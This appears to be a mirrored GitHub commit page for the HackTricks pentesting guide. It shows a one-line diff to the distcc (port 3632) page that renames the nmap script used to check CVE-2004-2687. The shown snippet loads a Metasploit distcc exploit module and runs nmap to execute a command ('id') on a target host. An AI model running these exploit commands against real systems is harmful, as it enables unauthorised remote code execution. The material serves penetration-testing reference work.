mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-15 01:17:36 +00:00
Merge pull request #809 from scmanjarrez/patch-1
Update 3632-pentesting-distcc.md
This commit is contained in:
commit
dc260326fc
1 changed files with 1 additions and 1 deletions
|
@ -32,7 +32,7 @@ Check if it's vulnerable to **CVE-2004-2687** to execute arbitrary code:
|
|||
|
||||
```bash
|
||||
msf5 > use exploit/unix/misc/distcc_exec
|
||||
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"
|
||||
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
|
||||
```
|
||||
|
||||
# Shodan
|
||||
|
|
Loading…
Reference in a new issue